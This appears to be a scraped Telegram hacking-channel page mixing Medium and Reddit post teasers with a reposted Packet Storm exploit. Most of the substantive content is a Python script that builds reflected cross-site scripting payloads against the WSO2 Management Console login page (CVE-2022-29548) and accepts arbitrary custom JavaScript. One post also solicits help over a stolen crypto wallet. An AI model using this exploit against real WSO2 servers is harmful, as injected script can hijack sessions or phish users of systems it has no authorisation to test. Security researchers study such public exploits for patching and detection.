Hacking Articles Tips Tricks Videos Tutorials
467 subscribers
65.7K photos
15 videos
157 files
131K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
MUST HAVE : Skill for Cyber Security Engineer

Are you the one who has passion in Cyber Security engineer ? Lets talk the business, meant i will share the must-have skill you need to…Continue reading on Medium »
Read more...
ITS TIME TO TAKEOVER ACCOUNT

HOW I WAS ABEL TO TAKEOVER ANY USER ACCOUNT USING INVITE FUNCTIONContinue reading on Medium »
Read more...
hacking: security in practice
The Chance of your life !

Hard Times call for extraordinary methods. A friend of mine got robbed on his crypto wallet. He got ambushed by his former co worker that knew he had acquired some currency and went for him with 4 people threaten to harm him and his family.. sad reality the police won’t do nothing because they are to stupid and incompetent to recognise all the transactions and the evidence… poor guy lost everything and has given up because the authorities won’t help him. So, if you want to do something good in this cold world dm me. Disclaimer: I do not want you to hack into his wallet or do other illegal things. If you think you can help him dm me and we discuss everything more detailed!

submitted by /u/legia56
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Script for automated login?

I wonder if I can build a simple script where it opens lets say "randomwebsite.com" but automatically enters login username and password without the need for me to type them (they will be provided in the script).

I don't want them saved in a browser, but just to fill the fields automatic upon running the script?

Is there a way to do that with bash or else?

submitted by /u/Warframe_Immortal
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Giving away 2 Tryhackme 1 month vouchers

Comment a reason you are in need of it

Random 2 will win it

Post redemption, winners also have to provide a screenshots as a proof in comments .

Any mod or i can choose the winners

it ends in 24 hours

submitted by /u/irankai
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WSO2 Management Console Cross Site Scripting

https://2.bp.blogspot.com/-S-N0q2XL8x8/WWlu5FDj1eI/AAAAAAAAIJA/vGskVQb_QegQZ0-UZMHSDeFJ08ju6pdGQCLcBGAs/s1600/h104.png
WSO2 Management Console suffers from a cross site scripting vulnerability. Many different product versions are affected.

SHA-256 | 209bab2c58dfce94eee51b7eb0b2675f337036396419fe6c59da3c84e1861a31

Download
# Exploit Title: WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS)
# Date: 21 Apr 2022
# Exploit Author: cxosmo
# Vendor Homepage: https://wso2.com
# Software Link: API Manager (https://wso2.com/api-manager/), Identity Server (https://wso2.com/identity-server/), Enterprise Integrator (https://wso2.com/integration/)
# Affected Version(s): API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0 and 4.0.0;
# API Manager Analytics 2.2.0, 2.5.0, and 2.6.0;
# API Microgateway 2.2.0;
# Data Analytics Server 3.2.0;
# Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0;
# IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0;
# Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0;
# Identity Server Analytics 5.5.0 and 5.6.0;
# WSO2 Micro Integrator 1.0.0.
# Tested on: API Manager 4.0.0 (OS: Ubuntu 21.04; Browser: Chromium Version 99.0.4844.82)
# CVE: CVE-2022-29548

import argparse
import logging
import urllib.parse

# Global variables
VULNERABLE_ENDPOINT = "/carbon/admin/login.jsp?loginStatus=false&errorCode="
DEFAULT_PAYLOAD = "alert(document.domain)"

# Logging config
logging.basicConfig(level=logging.INFO, format="")
log = logging.getLogger()

def generate_payload(url, custom_payload=False):
log.info(f"Generating payload for {url}...")
if custom_payload:
log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{custom_payload}//")
else:
log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{DEFAULT_PAYLOAD}//")

def clean_url_input(url):
if url.count("/") > 2:
return f"{url.split('/')[0]}//{url.split('/')[2]}"
else:
return url

def check_payload(payload):
encoded_characters = ['"', '<',']
if any(character in payload for character in encoded_characters):
log.info(f"Unsupported character(s) (\", <,) found in payload.")
return False
else:
return urllib.parse.quote(payload)

if __name__ == "__main__":
# Parse command line
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)
required_arguments = parser.add_argument_group('required arguments')
required_arguments.add_argument("-t", "--target",
help="Target address {protocol://host} of vulnerable WSO2 application (e.g. https://localhost:9443)",
required="True", action="store")
parser.add_argument("-p", "--payload",
help="Use custom JavaScript for generated payload (Some characters (\") are HTML-entity encoded and therefore are unsupported). (Defaults to alert(document.domain))",
action="store", default=False)
args = parser.parse_args()

# Clean user target input
args.target = clean_url_input(args.target.lower())

# Check for unsupported characters in custom payload; URL-encode as required
if args.payload:
args.payload = check_payload(args.payload)
if args.payload:
generate_payload(args.target, args.payload)
else:
generate_payload(args.target)

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video